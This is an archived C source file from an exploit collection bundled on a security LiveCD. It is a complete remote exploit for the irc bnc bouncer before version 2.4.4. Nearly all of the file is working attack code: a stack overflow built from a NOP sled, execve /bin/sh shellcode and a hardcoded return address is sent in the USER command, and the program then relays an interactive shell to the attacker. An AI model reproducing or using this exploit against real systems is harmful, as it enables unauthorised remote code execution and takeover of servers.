home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Chip 2007 January, February, March & April
/
Chip-Cover-CD-2007-02.iso
/
Pakiet bezpieczenstwa
/
mini Pentoo LiveCD 2006.1
/
mpentoo-2006.1.iso
/
livecd.squashfs
/
opt
/
pentoo
/
ExploitTree
/
application
/
irc
/
bnc
/
bnc244.c
< prev
next >
Wrap
C/C++ Source or Header
|
2005-02-12
|
4KB
|
155 lines
/* Exploit for irc bnc < 2.4.4.
* This is only my third remote exploit, ever, so it might be a bit rough
* around the edges. For instance the distance from the stack to the ret
* pointer has to be *exactly* 1031 for this to work
*
* Tekneeq - http://www.attrition.org/hosted/tekneeq
*/
#include <stdio.h>
#include <unistd.h>
#include <stdarg.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define RET_POS 1031
#define RETURN_ADDRESS 0xbffff9e0
char hellcode[]="\x31\xdb\x89\xd8\x89\xd9\xfe\xc1\xb0\x3f\xcd\x80\xfe\xc1"
"\x31\xc0\xb0\x3f\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
"\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh";
int fdprintf(int dafd,char *fmt,...);
int tcp_connect(struct in_addr addr,unsigned short port);
void RunShell(int thesock);
int main (int argc,char **argv)
{
int fd;
int ctr,a;
struct in_addr host;
unsigned short port;
unsigned char overflow_buf[4096];
unsigned long *ret;
if (argc < 3)
{
printf("Usage: %s <host> <port>\n",argv[0]);
exit(0);
}
if (!host_to_ip(argv[1],&host))
{
fprintf(stderr,"Hostname lookup failure\n");
exit(0);
}
if (!(port=atoi(argv[2])))
{
fprintf(stderr,"Invalid port !\n");
exit(0);
}
memset(overflow_buf,0x90,sizeof(overflow_buf)); /* fill it with NOPs */
a=0;
for (ctr=(RET_POS-strlen(hellcode));ctr<(RET_POS);ctr++)
overflow_buf[ctr]=hellcode[a++];
overflow_buf[RET_POS+4]=0;
ret=(unsigned long *)(overflow_buf+RET_POS);
*ret=RETURN_ADDRESS;
printf("Connecting\n");
fd=tcp_connect(host,port);
printf("Sending overflow\n");
fdprintf(fd,"USER %s\r\n",overflow_buf);
sleep(2);
printf("Got shell\n");
RunShell(fd);
}
int tcp_connect(struct in_addr addr,unsigned short port)
{
int fd;
struct sockaddr_in serv;
bzero(&serv,sizeof(serv));
serv.sin_addr=addr;
serv.sin_port=htons(port);
serv.sin_family=AF_INET;
if ((fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) < 0)
{
perror("socket");
exit(0);
}
if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0)
{
perror("connect");
exit(0);
}
return(fd);
}
int fdprintf(int dafd,char *fmt,...)
{
char mybuffer[4096];
va_list va;
va_start(va,fmt);
vsnprintf(mybuffer,4096,fmt,va);
write(dafd,mybuffer,strlen(mybuffer));
va_end(va);
return(1);
}
int host_to_ip(char *hostname,struct in_addr *addr)
{
struct hostent *res;
res=gethostbyname(hostname);
if (res==NULL)
return(0);
memcpy((char *)addr,res->h_addr,res->h_length);
return(1);
}
void RunShell(int thesock)
{
int n;
char recvbuf[1024];
fd_set rset;
while (1)
{
FD_ZERO(&rset);
FD_SET(thesock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(thesock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(thesock,&rset))
{
n=read(thesock,recvbuf,1024);
if (n <= 0)
{
printf("Connection closed\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
n=read(STDIN_FILENO,recvbuf,1024);
if (n>0)
{
recvbuf[n]=0;
write(thesock,recvbuf,n);
}
}
}
}
/* www.hack.co.za [2000]*/
